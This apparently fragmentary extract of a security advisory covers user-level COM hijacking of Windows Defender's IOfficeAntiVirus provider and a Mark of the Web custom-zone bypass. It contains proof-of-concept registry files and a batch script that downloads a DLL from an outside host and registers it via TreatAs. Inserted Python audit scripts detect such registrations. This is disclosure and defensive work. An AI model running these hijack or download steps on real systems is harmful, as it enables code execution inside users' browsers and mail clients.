“For an attacker to do as the report indicates, they would already need to have gained sufficient control over the victim’s system to change the ProgramFiles environment variable for the process that is instantiating this COM class. This highlights local code execution.”
OUCH²: the attack surface in this scenario is provided by Windows Defender itself, whose poor implementation (see above) allows the attack in the first place.
“Additionally, our design to get AV to load in a utility process greatly reduces the attack surface of this scenario.”
There is also no utility process started here: the attacker-controlled DLL is loaded and executed in the processes which want to call the AV, instead of the DLL installed with Windows Defender, preventing exactly the intended execution of the AV’s utility process and defeating your design!
“Utility processes are also more restricted than the browser process generally so this is another win in addition to the process decoupling.”
OUCH³: there is neither a utility process nor a decoupled process involved! The demonstration runs an arbitrary (rogue or malicious) DLL in the process of a WWW browser, a mail and news client, an instant messenger as well as the shell alias File Explorer, with the credentials of the current user, unrestricted.
“As such, we are closing this case.”
That said, I conclude you are neither interested in trustworthy computing nor in the safety and security of your customers; I recommend that you, your developers, your engineers and of course your obviously incompetent managers take a look at your government’s Cybersecurity & Infrastructure Security Agency’s Secure by Design initiative and the underlying principle!
generalised system images, designed to run from a single hard disk partition with the drive letter C assigned. All directories and files contained within these system images have fixed, language-independent (path)names and can neither be relocated nor renamed: see the MSKB articles 949977 and 2787623 for some details. Additionally, the vast majority of files are (nowadays) registered with their absolute (fully qualified) pathname containing the (fixed) drive letter and the language-independent directory name, which renders their change or relocation practically impossible.
The use of environment variables within pathnames serves no (good) purpose: it is not just deprecated and superfluous but outright dangerous, allowing attacks like those shown above in the first place, and must therefore be avoided and banned!
merged view of the HKEY_CLASSES_ROOT virtual Registry tree. Thanks to this feature, COM classes and interfaces registered by (unprivileged) users below the user’s HKEY_CURRENT_USER\Software\Classes Registry key obscure the corresponding COM classes and interfaces registered (by administrators) below the machine’s HKEY_LOCAL_MACHINE\SOFTWARE\Classes Registry key.
Note: the resulting well-known weakness is documented as CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), CWE-73: External Control of File Name or Path, CWE-426: Untrusted Search Path and CWE-427: Uncontrolled Search Path Element in the CWE™, allowing well-known attacks like CAPEC-13: Subverting Environment Variable Values and CAPEC-471: Search Order Hijacking documented in the CAPEC™.
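An added audit example (not the page’s, Stefan Kanthak’s or Microsoft’s code) that checks registry exports for the two weaknesses this page describes: in-proc COM servers registered through environment variables such as %ProgramData% (plus the superfluous double quotes noted above), and per-user CLSIDs below HKEY_CURRENT_USER\Software\Classes that take the place of machine-wide classes through the merged HKEY_CLASSES_ROOT view, whether by the same CLSID, by a TreatAs redirection or by implementing the same component category. It parses REGEDIT4 text, so it runs offline on the output of REG.EXE EXPORT; the embedded samples are copied from the page’s own dumps, with a constructed path standing in for ‹path›, and all function names are assumptions.

```python
"""Audit REGEDIT4 exports for in-proc COM servers registered through environment
variables (CWE-427) and for per-user CLSIDs that displace machine-wide classes.
Added example, not code from the page; samples are copied from the page's dumps."""
import re

QUOTED = re.compile(r'"((?:[^"\\]|\\.)*)"')          # one .reg string literal
CLSID_KEY = r"\\CLSID\\(\{[0-9A-Fa-f-]{36}\})(.*)"  # ...\CLSID\{guid}\subkeys
ENV_REF = re.compile(r"%([^%]+)%")                   # %VAR% reference in a path

def _unescape(s):
    return re.sub(r"\\(.)", r"\1", s)

def _decode_value(raw):
    """Right-hand side of a .reg line -> (type, data)."""
    raw = raw.strip()
    if raw.startswith("expand:"):                     # shorthand used in the page's dumps
        m = QUOTED.match(raw, 7)
        return "REG_EXPAND_SZ", (_unescape(m.group(1)) if m else raw)
    if raw.startswith("hex(2):"):                     # what REG.EXE EXPORT writes: UTF-16LE bytes
        data = bytes(int(b, 16) for b in raw[7:].split(",") if b.strip())
        return "REG_EXPAND_SZ", data.decode("utf-16-le").rstrip("\0")
    m = QUOTED.match(raw)
    return ("REG_SZ", _unescape(m.group(1))) if m else ("RAW", raw)

def parse_reg_export(text):
    """Return {key: {value_name: (type, data)}}; the default value is named '@'."""
    keys, current, pending = {}, None, ""
    for line in text.splitlines():
        line = pending + line.strip()
        if line.endswith("\\"):                       # hex data continued on the next line
            pending = line[:-1]
            continue
        pending = ""
        if not line or line.startswith((";", "REGEDIT", "Windows Registry")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current is not None and "=" in line:
            name, _, raw = line.partition("=")
            keys[current]["@" if name == "@" else _unescape(name.strip('"'))] = _decode_value(raw)
    return keys

def find_env_var_servers(keys):
    """InprocServer32 defaults containing %VAR% references (user-redirectable) or superfluous quotes."""
    findings = []
    for key, values in keys.items():
        if not key.lower().endswith("\\inprocserver32") or "@" not in values:
            continue
        vtype, path = values["@"]
        env_vars = ENV_REF.findall(path)
        quoted = path.startswith('"') and path.endswith('"')
        if env_vars or quoted:
            m = re.search(CLSID_KEY, key, re.I)
            findings.append({"clsid": m.group(1).upper() if m else key, "type": vtype,
                             "path": path, "env_vars": env_vars, "superfluous_quotes": quoted})
    return findings

def _clsid_map(keys, root):
    """{CLSID: {relative subkey (lowercase): values}} for keys below root\\CLSID."""
    out = {}
    for key, values in keys.items():
        m = re.match(re.escape(root) + CLSID_KEY, key, re.I)
        if m:
            out.setdefault(m.group(1).upper(), {})[m.group(2).strip("\\").lower()] = values
    return out

def _categories(subkeys):
    return {s.split("\\", 1)[1].upper() for s in subkeys if s.startswith("implemented categories\\")}

def find_user_clsid_shadowing(hklm_keys, hkcu_keys):
    """Per-user classes that take the place of machine-wide ones through the merged
    HKEY_CLASSES_ROOT view: same CLSID, TreatAs redirection, or a shared category."""
    machine = _clsid_map(hklm_keys, "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes")
    machine.update(_clsid_map(hklm_keys, "HKEY_CLASSES_ROOT"))   # older dumps use HKCR
    machine_cats = set().union(*(_categories(s) for s in machine.values()))
    findings = []
    for clsid, subkeys in _clsid_map(hkcu_keys, "HKEY_CURRENT_USER\\Software\\Classes").items():
        server = subkeys.get("inprocserver32", {}).get("@", (None, None))[1]
        target = subkeys.get("treatas", {}).get("@", (None, None))[1]
        reasons = []
        if clsid in machine:
            reasons.append("shadows machine-wide CLSID")
        if isinstance(target, str) and target.upper() in machine:
            reasons.append(f"TreatAs redirects to machine-wide CLSID {target.upper()}")
        for cat in sorted(_categories(subkeys) & machine_cats):
            reasons.append(f"implements category {cat} like a machine-wide class")
        if reasons:
            findings.append({"clsid": clsid, "server": server, "reasons": reasons})
    return findings

# Constructed samples: entries of the page's HKLM dump and of SENTINEL.REG, with the
# constructed path C:\Users\Public\SENTINEL.DLL standing in for <path>.
HKLM_SAMPLE = r'''REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\InprocServer32]
@=expand:"\"%ProgramData%\\Microsoft\\Windows Defender\\platform\\4.18.2003.8-0\\MpOav.dll\""
"ThreadingModel"="Both"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InprocServer32]
@=expand:"%windir%\\system32\\amsi.dll"
'''
HKCU_SAMPLE = r'''[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}]
[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]
[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32]
@="C:\\Users\\Public\\SENTINEL.DLL"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\TreatAs]
@="{2781761E-28E0-4109-99FE-B9D127C57AFE}"
'''
```

On a live system, export HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID and HKEY_CURRENT_USER\Software\Classes\CLSID with REG.EXE EXPORT (its files are UTF-16 with a byte order mark, so open them with encoding="utf-16") and pass the parsed dictionaries to find_env_var_servers() and find_user_clsid_shadowing(). Every finding of the first function is a registration that a user-level change of the named environment variable redirects; a TreatAs or shared-category finding of the second is a per-user class that hosts enumerating that category, such as the Attachment Manager, will instantiate in place of the machine-wide one.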
Log on to an arbitrary (unprivileged) user account.
Download the
SENTINEL.DLL
of the
Vulnerability and Exploit Detector
and save it in an arbitrary directory.
Create a text file SENTINEL.REG
with the following
contents:
REGEDIT4
; Copyright © 2004-2024, Stefan Kanthak <stefan.kanthak@nexgo.de>
[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}]
@="Vulnerability and Exploit Detector"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]
@="MSOfficeAntiVirus"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32]
; NOTE: replace ‹path› with the directory used in step 2.
@="‹path›\\SENTINEL.DLL"
"ThreadingModel"="Both"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\TreatAs]
@="{2781761E-28E0-4109-99FE-B9D127C57AFE}"
; NOTE: the following entries are optional and can be omitted!
[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]
@="IOfficeAntiVirus"
[HKEY_CURRENT_USER\Software\Classes\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]
@="IOfficeAntiVirus"
[HKEY_CURRENT_USER\Software\Classes\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\BaseInterface]
@="{00000000-0000-0000-C000-000000000046}" ; IUnknown
[HKEY_CURRENT_USER\Software\Classes\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\NumMethods]
@="4"
4. Double-click the file SENTINEL.REG created in the previous step 3. to merge it into the user's Registry.
5. Run the following command line to verify the proper registration of the COM class:
RUNDLL32.EXE /STA {2781761E-28E0-4109-99FE-B9D127C57AFE}
6. Download an arbitrary (portable executable image) file with your WWW browser, for example SENTINEL.EXE, or save an attachment in your mail client, and notice the message boxes displayed from the SENTINEL.DLL downloaded in step 2.
Rem Copyright © 2004-2024, Stefan Kanthak <stefan.kanthak@nexgo.de>
"%SystemRoot%\System32\BITSAdmin.exe" /TRANSFER IOAV /DOWNLOAD /PRIORITY FOREGROUND http://skanthak.hier-im-netz.de/download/SENTINEL.CAB "%TMP%\SENTINEL.CAB"
If Not Exist "%TMP%\SENTINEL.CAB" Exit /B
"%SystemRoot%\System32\Expand.exe" "%TMP%\SENTINEL.CAB" /F:* "%TMP%"
If Not Exist "%TMP%\AMD64\SENTINEL.DLL" Exit /B
If Not Exist "%TMP%\I386\SENTINEL.DLL" Exit /B
Start https://skanthak.hier-im-netz.de/download/SENTINEL.EXE
If "%PROCESSOR_ARCHITECTURE%" == "AMD64" Goto :AMD64
If "%PROCESSOR_ARCHITEW6432%" == "AMD64" Goto :WOW6432
If "%PROCESSOR_ARCHITECTURE%" == "x86" Goto :I386
Exit /B
:AMD64
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}" /VE /T REG_SZ /D "MSOfficeAntiVirus" /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32" /VE /T REG_SZ /D "%TMP%\AMD64\SENTINEL.DLL" /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32" /V "ThreadingModel" /T REG_SZ /D "Both" /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\TreatAs" /VE /T REG_SZ /D "{2781761E-28E0-4109-99FE-B9D127C57AFE}" /F
"%SystemRoot%\SysWoW64\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}" /VE /T REG_SZ /D "MSOfficeAntiVirus" /F
"%SystemRoot%\SysWoW64\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32" /VE /T REG_SZ /D "%TMP%\I386\SENTINEL.DLL" /F
"%SystemRoot%\SysWoW64\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32" /V "ThreadingModel" /T REG_SZ /D "Both" /F
"%SystemRoot%\SysWoW64\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\TreatAs" /VE /T REG_SZ /D "{2781761E-28E0-4109-99FE-B9D127C57AFE}" /F
"%ProgramFiles(x86)%\Internet Explorer\IExplore.exe" https://skanthak.hier-im-netz.de/download/SENTINEL.CAB
Goto :COMMON
:WOW6432
"%SystemRoot%\Sysnative\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}" /VE /T REG_SZ /D "MSOfficeAntiVirus" /F
"%SystemRoot%\Sysnative\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32" /VE /T REG_SZ /D "%TMP%\AMD64\SENTINEL.DLL" /F
"%SystemRoot%\Sysnative\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32" /V "ThreadingModel" /T REG_SZ /D "Both" /F
"%SystemRoot%\Sysnative\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\TreatAs" /VE /T REG_SZ /D "{2781761E-28E0-4109-99FE-B9D127C57AFE}" /F
"%ProgramW6432%\Internet Explorer\IExplore.exe" https://skanthak.hier-im-netz.de/download/SENTINEL.CAB
:I386
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}" /VE /T REG_SZ /D "MSOfficeAntiVirus" /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32" /VE /T REG_SZ /D "%TMP%\I386\SENTINEL.DLL" /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32" /V "ThreadingModel" /T REG_SZ /D "Both" /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\TreatAs" /VE /T REG_SZ /D "{2781761E-28E0-4109-99FE-B9D127C57AFE}" /F
:COMMON
"%ProgramFiles%\Internet Explorer\IExplore.exe" https://skanthak.hier-im-netz.de/download/SENTINEL.CAB
Start https://skanthak.hier-im-netz.de/download/SENTINEL.DLL
Start "IOAV" "%USERPROFILE%\Downloads\SENTINEL.EXE"
Exit /B
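As an added example (neither the page's nor Microsoft's code), a Python check that reads a REGEDIT4 export and flags user-level COM registrations of the kind shown above: an HKCU CLSID that also exists machine-wide and therefore obscures it in HKEY_CLASSES_ROOT, an HKCU member of the MSOfficeAntiVirus category, and an InProcServer32 path built from a user-writable environment variable. The sample export and the machine-wide CLSID set are constructed for the demonstration; parse_reg handles string values only.

```python
import re

# Category GUID of IOfficeAntiVirus providers, taken from the page's SENTINEL.REG
MSOFFICE_ANTIVIRUS_CATID = "{56FFCC30-D398-11D0-B2AE-00A0C908FA49}"
# Environment variables expanding to directories an unprivileged user can write to
USER_WRITABLE_VARS = ("%TMP%", "%TEMP%", "%USERPROFILE%", "%APPDATA%", "%PROGRAMDATA%")
HKCU_CLSID = "HKEY_CURRENT_USER\\SOFTWARE\\CLASSES\\CLSID\\"
_KEY_RE = re.compile(r"^\[(.+)\]\s*$")
_VAL_RE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(?:expand:)?"((?:[^"\\]|\\.)*)"')


def parse_reg(text):
    """Parse REGEDIT4 text into {key_path: {value_name: string_data}}."""
    keys, current = {}, None
    for line in (l.strip() for l in text.splitlines()):
        if not line or line.startswith(";"):
            continue
        if key := _KEY_RE.match(line):
            current = key.group(1)
            keys.setdefault(current, {})
        elif (val := _VAL_RE.match(line)) and current is not None:
            name = "@" if val.group(1) == "@" else val.group(1)[1:-1]
            keys[current][name] = val.group(2).replace('\\"', '"').replace("\\\\", "\\")
    return keys


def find_user_com_hijacks(keys, machine_clsids):
    """Return (clsid, reason) pairs for HKCU COM registrations that merit review."""
    machine, findings = {c.upper() for c in machine_clsids}, []
    for path, values in keys.items():
        if not path.upper().startswith(HKCU_CLSID):
            continue
        clsid, _, sub = path[len(HKCU_CLSID):].upper().partition("\\")
        default = values.get("@", "")
        if sub == "" and clsid in machine:
            findings.append((clsid, "shadows a machine-wide CLSID via the HKEY_CLASSES_ROOT merge"))
        elif sub == "IMPLEMENTED CATEGORIES\\" + MSOFFICE_ANTIVIRUS_CATID:
            findings.append((clsid, "registers a user-level IOfficeAntiVirus provider"))
        elif sub == "INPROCSERVER32" and any(v in default.upper() for v in USER_WRITABLE_VARS):
            findings.append((clsid, "InProcServer32 loads from user-writable path " + default))
    return findings


# Constructed sample modelled on the page's SENTINEL.REG; not an export from a real machine
SAMPLE_REG = r"""REGEDIT4
[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}]
@="Vulnerability and Exploit Detector"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]
@="MSOfficeAntiVirus"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32]
@="%TMP%\\AMD64\\SENTINEL.DLL"
[HKEY_CURRENT_USER\Software\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}]
@="user-level copy that obscures Windows Defender's class"
"""
# Windows Defender's IOfficeAntiVirus CLSID from the page, used as the machine-wide reference set
MACHINE_CLSIDS = {"{2781761E-28E0-4109-99FE-B9D127C57AFE}"}
```

On a live system the same checks apply to the output of "REG EXPORT HKCU\Software\Classes\CLSID", compared against an export of HKLM\SOFTWARE\Classes\CLSID.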
Mark of the Web, an NTFS Alternate Data Stream named Zone.Identifier containing the text [ZoneTransfer]\r\nZoneId=‹integer›\r\n, to the saved file; in the second case it evaluates the Mark of the Web.
Information about the Unsafe File List in Internet Explorer
REGEDIT4
[HKEY_CLASSES_ROOT\.‹extension›]
"EditFlags"=dword:00020000 ; FTA_AlwaysUnsafe
[HKEY_CLASSES_ROOT\‹ProgId›]
"EditFlags"=dword:00020000 ; FTA_AlwaysUnsafe
[HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Policies\Associations]
; =dword:00001806 ; high risk
"DefaultFileTypeRisk"=dword:00001807 ; moderate risk
; =dword:00001808 ; low risk
"HighRiskFileTypes"="{.‹extension›|‹ProgId›};…"
"LowRiskFileTypes"="{.‹extension›|‹ProgId›};…"
"ModRiskFileTypes"="{.‹extension›|‹ProgId›};…"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments]
"HideZoneInfoOnProperties"=dword:00000000
"SaveZoneInformation"=dword:00000002
"ScanWithAntiVirus"=dword:00000003
"UseTrustedHandlers"=dword:00000003
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Currentversion\Policies\Associations]
; =dword:00001806 ; high risk
"DefaultFileTypeRisk"=dword:00001807 ; moderate risk
; =dword:00001808 ; low risk
"HighRiskFileTypes"="{.‹extension›|‹ProgId›};…"
"LowRiskFileTypes"="{.‹extension›|‹ProgId›};…"
"ModRiskFileTypes"="{.‹extension›|‹ProgId›};…"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments]
"HideZoneInfoOnProperties"=dword:00000000
"SaveZoneInformation"=dword:00000002
"ScanWithAntiVirus"=dword:00000003
"UseTrustedHandlers"=dword:00000003
Windows 8 introduced Windows Defender SmartScreen ...
REGEDIT4
[HKEY_CLASSES_ROOT\‹ProgId›\Shell\‹Verb›]
"NoSmartScreen"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer]
"SmartScreenEnabled"="Warn"
; ="Off"
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System]
"EnableSmartScreen"=dword:00000001
"ShellSmartScreenLevel"="Warn"
; ="None"
; ="Block"
Log on to an arbitrary (unprivileged) user account and start the Command Processor %SystemRoot%\System32\Cmd.exe alias %ComSpec% in an arbitrary, preferably empty directory.
Note: if you don’t want to switch between the Command Processor and File Explorer windows, choose the desktop and skip step 3.
Execute the following (block of) command lines to create 8 text files Offender.cmd, Offender.com, Offender.exe, Offender.reg, Offender.rtf, Offender.txt, Offender.url and Offender.vbs, plus a cabinet archive Offender.cab in the directory chosen in step 1.:
COPY NUL: Offender.exe
1>Offender.cmd ECHO PAUSE
1>Offender.com ECHO X5O!P%@AP[4\PZX54(P^^^^)7CC)7}$Write_any_string_on_standard_output$H+H*
1>Offender.reg ECHO REGEDIT4
1>Offender.rtf ECHO {\rtf1\ansi}
1>Offender.txt ECHO
1>Offender.url ECHO [InternetShortcut]
1>>Offender.url ECHO URL=about:blank
1>Offender.vbs ECHO WScript.Echo WScript.ScriptFullName
MAKECAB.EXE Offender.txt Offender.cab
1 file(s) copied.
Cabinet Maker - Lossless Data Compression Tool

100.00% [flushing current folder]
Note: the file extensions .cmd, .com, .exe, .reg, .rtf, .url and .vbs are all classified "dangerous" – see the documentation for the Win32 functions AssocIsDangerous() and SaferiIsExecutableFileType() for details.
FILETYPEATTRIBUTEFLAGS enumeration
Note: Offender.com is a modified EICAR standard anti-virus test file; its file size is 70 bytes.
Start the File Explorer to open the directory chosen in step 1.:
START .
Double-click the 8 text files created in step 2. to open or execute them (in alphabetical order) and notice the default behaviour:
- Offender.cmd opens another window of the Command Processor, writes the text "Press any key to continue . . ." and waits for any key to be pressed.
- Offender.com fails with error code 216 alias ERROR_EXE_MACHINE_TYPE_MISMATCH, derived from NTSTATUS 0x40000023 alias STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE – Windows' module loader displays a message box to report the error.
- Offender.com writes the text "Write_any_string_on_standard_output" and closes the window of the NT Virtual DOS Machine immediately.
- Offender.exe fails (expected and intended) with error code 193 alias ERROR_BAD_EXE_FORMAT, derived from NTSTATUS 0xC000011E alias STATUS_MAPPED_FILE_SIZE_ZERO or 0xC000012F alias STATUS_INVALID_IMAGE_NOT_MZ respectively; Windows' module loader displays a message box to report the error.
- Offender.reg starts the Registry Editor which asks for confirmation (twice if started in the "protected" administrator account created during Windows Setup).
- Offender.rtf starts WordPad which shows a blank page.
- "Execution" of Offender.txt starts Editor which shows the text "ECHO is on".
- Offender.url starts the default WWW browser which shows a blank page.
- Offender.vbs starts the Windows Script Host which displays a message box titled "Windows Script Host" with the fully qualified pathname of Offender.vbs and waits for the button to be clicked.
Close WordPad, Editor and all message boxes.
Double-click the cabinet archive Offender.cab created in step 1. to open it, then select its contents and click Extract… – the archive file opens in File Explorer and extraction succeeds.
Right click the file Offender.txt to display its context menu, then open the Send to drop-down menu and click Compressed (zipped) folder to create a ZIP archive Offender.zip.
Right click the ZIP archive created in step 5. to display its context menu, then click Extract all… and follow the wizard: extraction succeeds too.
Activate the Command Processor window and execute the following (block of) command lines to add a Mark of the Web specifying the Internet zone to the 10 files Offender.* created before:
FOR %? IN (Offender.*) DO @(
    ECHO [ZoneTransfer]
    ECHO ZoneId=3
) 1>%?:Zone.Identifier
( ECHO [ZoneTransfer] ECHO ZoneId=3 ) 1>Offender.cab:Zone.Identifier
( ECHO [ZoneTransfer] ECHO ZoneId=3 ) 1>Offender.cmd:Zone.Identifier
( ECHO [ZoneTransfer] ECHO ZoneId=3 ) 1>Offender.com:Zone.Identifier
( ECHO [ZoneTransfer] ECHO ZoneId=3 ) 1>Offender.exe:Zone.Identifier
( ECHO [ZoneTransfer] ECHO ZoneId=3 ) 1>Offender.reg:Zone.Identifier
( ECHO [ZoneTransfer] ECHO ZoneId=3 ) 1>Offender.rtf:Zone.Identifier
( ECHO [ZoneTransfer] ECHO ZoneId=3 ) 1>Offender.txt:Zone.Identifier
( ECHO [ZoneTransfer] ECHO ZoneId=3 ) 1>Offender.url:Zone.Identifier
( ECHO [ZoneTransfer] ECHO ZoneId=3 ) 1>Offender.vbs:Zone.Identifier
( ECHO [ZoneTransfer] ECHO ZoneId=3 ) 1>Offender.zip:Zone.Identifier
Activate the File Explorer window, right click on one of the 10 files Offender.* to display its context menu, then click Properties – the security notice "This file came from another computer and might be blocked to help protect this computer." is displayed at the bottom of the Properties dialog box.
Close the Properties dialog box, then double-click the application Offender.exe to execute it: a dialog box titled "Windows protected your PC" with the message text "Windows Defender SmartScreen prevented an unrecognized app from starting, Running this app might put your PC at risk. […]" is displayed. After clicking the button the module loader displays the same error message box as in step 4.
Double-click the other 9 files Offender.* too: except for Offender.cab, Offender.rtf, Offender.txt and Offender.zip the same dialog box titled "Windows protected your PC" is displayed; clicking the button yields the same result as in step 4.
Repeat steps 6. and 7., then right click the extracted files to display their context menu and click Properties – the security notice "This file came from another computer and might be blocked to help protect this computer." is displayed at the bottom of the Properties dialog box, demonstrating that file extraction propagates the Mark of the Web for the Internet zone.
Activate the Command Processor window again and execute the following (block of) command lines to write a Mark of the Web specifying a custom zone to the 10 files Offender.* created before:
FOR %? IN (Offender.*) DO @(
    ECHO [ZoneTransfer]
    ECHO ZoneId=1000
) 1>%?:Zone.Identifier
( ECHO [ZoneTransfer] ECHO ZoneId=1000 ) 1>Offender.cab:Zone.Identifier
( ECHO [ZoneTransfer] ECHO ZoneId=1000 ) 1>Offender.cmd:Zone.Identifier
( ECHO [ZoneTransfer] ECHO ZoneId=1000 ) 1>Offender.com:Zone.Identifier
( ECHO [ZoneTransfer] ECHO ZoneId=1000 ) 1>Offender.exe:Zone.Identifier
( ECHO [ZoneTransfer] ECHO ZoneId=1000 ) 1>Offender.reg:Zone.Identifier
( ECHO [ZoneTransfer] ECHO ZoneId=1000 ) 1>Offender.rtf:Zone.Identifier
( ECHO [ZoneTransfer] ECHO ZoneId=1000 ) 1>Offender.url:Zone.Identifier
( ECHO [ZoneTransfer] ECHO ZoneId=1000 ) 1>Offender.vbs:Zone.Identifier
( ECHO [ZoneTransfer] ECHO ZoneId=1000 ) 1>Offender.zip:Zone.Identifier
Activate the File Explorer window, right click on one of the 10 files Offender.* to display its context menu, then click Properties – the security notice "This file came from another computer and might be blocked to help protect this computer." is displayed at the bottom of the Properties dialog box.
Close the Properties dialog box, then double-click the application Offender.exe to execute it again: no reaction, no warning, no error message box!
Double-click the other 9 files Offender.* again: Offender.cmd, Offender.com and Offender.reg exhibit no reaction too, while Offender.cab, Offender.rtf, Offender.txt, Offender.url, Offender.vbs and Offender.zip are opened as before.
Repeat step 6., then right click the extracted file to display its context menu and click Properties – the security notice "This file came from another computer and might be blocked to help protect this computer." is not displayed at the bottom of the Properties dialog box, i.e. the Mark of the Web for the custom zone was not propagated from the cabinet archive Offender.cab!
Repeat step 7.: an error message box "Access is denied." is displayed.
Activate the Command Processor window and execute the following command line to open or execute all 10 files for the last time:
FOR %? IN (Offender.*) DO START /WAIT %?
START /WAIT Offender.cab
START /WAIT Offender.cmd
Access denied
START /WAIT Offender.com
Access denied
START /WAIT Offender.exe
Access denied
START /WAIT Offender.reg
Access denied
START /WAIT Offender.rtf
START /WAIT Offender.txt
START /WAIT Offender.url
START /WAIT Offender.vbs
START /WAIT Offender.zip
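As an added example (not the page's code and not Windows' own logic), a Python reference reading of the Zone.Identifier stream that fails closed: the custom ZoneId=1000 from the last experiment, and any stream whose ZoneId is missing or unparsable, is treated as the Internet zone instead of being silently passed, and the dangerous-extension list quoted above decides whether a warning is due. The zone names, the warn policy and the sample streams are assumptions constructed for the demonstration.

```python
import os
import re

# Zone identifiers Windows' URL security zones define; every other value is undefined
KNOWN_ZONES = {0: "Local machine", 1: "Local intranet", 2: "Trusted sites",
               3: "Internet", 4: "Restricted sites"}
INTERNET = 3
# File extensions the page lists as classified "dangerous"
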